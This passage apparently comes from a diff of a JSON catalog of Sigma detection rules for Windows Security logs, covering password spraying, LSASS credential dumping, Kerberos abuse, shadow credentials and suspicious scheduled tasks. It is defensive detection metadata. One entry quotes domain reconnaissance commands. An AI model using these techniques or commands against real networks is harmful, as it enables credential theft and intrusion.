frack113", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", - "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", - "value": "Valid Users Failing to Authenticate from Single Source Using NTLM", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", - "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", - "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], 
- "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", - "value": "Account Tampering - Suspicious Failed Logon Reasons", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", - "https://twitter.com/SBousseaden/status/1101431884540710913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_failed_logon_reasons.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "User using a disabled account" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "value": "Failed Logon From Public IP", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "creation_date": "2020/05/06", - "filename": 
"win_security_susp_failed_logon_source.yml", - "author": "NVISO", - "level": "medium", - "falsepositive": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a source system failing to authenticate against a remote host with multiple users.", - "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", - "value": "Multiple Users Remotely Failing To Authenticate From Single Source", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_remote_logons_single_source.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", - "value": "Kerberos Manipulation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2017/02/10", - "filename": "win_security_susp_kerberos_manipulation.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Faulty legacy applications" - ], - "logsource.category": "No established category", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", - "value": "KrbRelayUp Attack Pattern", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2022/04/27", - "filename": "win_security_susp_krbrelayup.yml", - "author": "@SBousseaden, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "value": "Suspicious LDAP-Attributes Used", - "meta": { - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ], - "creation_date": "2019/03/24", - "filename": "win_security_susp_ldap_dataexchange.yml", - "author": "xknow @xknow_infosec", - "level": "high", - "falsepositive": [ - "Companies, who 
may use these default LDAP-Attributes for personal information" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1189469425482829824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" - ], - "creation_date": "2019/10/31", - "filename": "win_security_susp_local_anon_logon_created.yml", - "author": "James Pemberton / @4A616D6573", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes logging on with explicit credentials", - "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "value": "Suspicious Remote Logon with Explicit Credentials", - "meta": { - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" - ], - "tags": [ - "attack.t1078", - "attack.lateral_movement" - ], - "creation_date": "2020/10/05", - "filename": "win_security_susp_logon_explicit_credentials.yml", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Administrators that use the RunAS command or scheduled tasks" - ], - "logsource.category": "No established category", - "logsource.product": 
"windows" - } - }, - { - "description": "Detects logon events that specify new credentials", - "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", - "value": "Outgoing Logon with New Credentials", - "meta": { - "refs": [ - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/06", - "filename": "win_security_susp_logon_newcredentials.yml", - "author": "Max Altgelt", - "level": "low", - "falsepositive": [ - "Legitimate remote administration activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "value": "Password Dumper Activity on LSASS", - "meta": { - "refs": [ - "https://twitter.com/jackcr/status/807385668833968128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2017/02/12", - "filename": "win_security_susp_lsass_dump.yml", - "author": "sigma", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects process handle on LSASS process with certain access mask", - "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "value": "Generic Password Dumper Activity on LSASS", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" - ], - "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" - ], - "creation_date": "2019/11/01", - "filename": "win_security_susp_lsass_dump_generic.yml", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", - "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", - "value": "Suspicious Multiple File Rename Or Delete Occurred", - "meta": { - "refs": [ - "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2020/10/16", - "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", - "author": "Vasiliy Burov, oscd.community", - "level": "medium", - "falsepositive": [ - "Software uninstallation", - "Files restore activities" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "value": "Reconnaissance Activity", - "meta": { - "refs": [ - "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], - "creation_date": "2017/03/07", - "filename": "win_security_susp_net_recon_activity.yml", - "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "level": "high", - "falsepositive": [ - "Administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", - "value": "Password Protected ZIP File Opened", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", - "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", - "value": "Password Protected ZIP File Opened (Suspicious Filenames)", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip_filename.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "uuid": "571498c8-908e-40b4-910b-d2369159a3da", - "value": "Password Protected ZIP File Opened (Email Attachment)", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/09", - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "value": "Suspicious Outbound Kerberos Connection - Security", - "meta": { - "refs": [ - "https://github.com/GhostPack/Rubeus", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_susp_outbound_kerberos_connection.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Other browsers" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible addition of shadow credentials to an active directory object.", - "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", - "value": "Possible Shadow Credentials Added", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556" - ], - "creation_date": "2022/10/17", - "filename": "win_security_susp_possible_shadow_credentials_added.yml", - "author": "Nasreddine Bencherchali (rule), Elastic (idea)", - "level": "high", - "falsepositive": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "value": "Suspicious PsExec Execution", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_susp_psexec.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known sensitive file extensions accessed on a network share", - "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", - "value": "Suspicious Access to Sensitive File Extensions", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection", - "attack.t1039" - ], - "creation_date": "2019/04/03", - "filename": "win_security_susp_raccess_sensitive_fext.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects service ticket requests using RC4 encryption type", - "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", - "value": "Suspicious Kerberos 
RC4 Ticket Encryption", - "meta": { - "refs": [ - "https://adsecurity.org/?p=3458", - "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2017/02/06", - "filename": "win_security_susp_rc4_kerberos.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "value": "RottenPotato Like Attack Pattern", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1195284233729777665", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "creation_date": "2019/11/15", - "filename": "win_security_susp_rottenpotato.yml", - "author": "@SBousseaden, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", - "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", - "value": "Possible Remote Password Change Through SAMR", - "meta": { - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2017/06/09", - "filename": "win_security_susp_samr_pwset.yml", - "author": "Dimitrios Slamaris", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "value": "Suspicious Scheduled Task Creation", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_creation.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "value": "Important Scheduled Task Deleted/Disabled", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" - ], - "tags": [ - 
"attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_delete.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", - "value": "Suspicious Scheduled Task Update", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_security_susp_scheduled_task_update.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects renaming of file while deletion with SDelete tool.", - "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "value": "Secure Deletion with SDelete", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" - ], - "creation_date": "2017/06/14", - "filename": "win_security_susp_sdelete.yml", - 
"author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Legitimate usage of SDelete" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", - "value": "Unauthorized System Time Modification", - "meta": { - "refs": [ - "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2019/02/05", - "filename": "win_security_susp_time_modification.yml", - "author": "@neu5ron", - "level": "low", - "falsepositive": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detection of logins performed with WMI", - "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", - "value": "Login with WMI", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2019/12/04", - "filename": "win_security_susp_wmi_login.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Monitoring tools", - "Legitimate system administration" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "uuid": 
"586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "value": "Remote Service Activity via SVCCTL Named Pipe", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_svcctl_remote_service.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "value": "SysKey Registry Keys Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2019/08/12", - "filename": "win_security_syskey_registry_access.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "value": "Sysmon Channel Reference Deletion", - "meta": { - "refs": [ - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/07/14", - "filename": "win_security_sysmon_channel_reference_deletion.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", - "value": "Tap Driver Installation - Security", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2019/10/24", - "filename": "win_security_tap_driver_installation.yml", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", - "value": "Suspicious Teams Application Related ObjectAcess Event", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": 
"2022/09/16", - "filename": "win_security_teams_suspicious_objectaccess.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", - "value": "Transferring Files with Credential Data via Network Shares", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ], - "creation_date": "2019/10/22", - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", - "value": "User Added to Local Administrators", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/03/14", - "filename": "win_security_user_added_to_local_administrators.yml", - "author": "Florian Roth", - "level": 
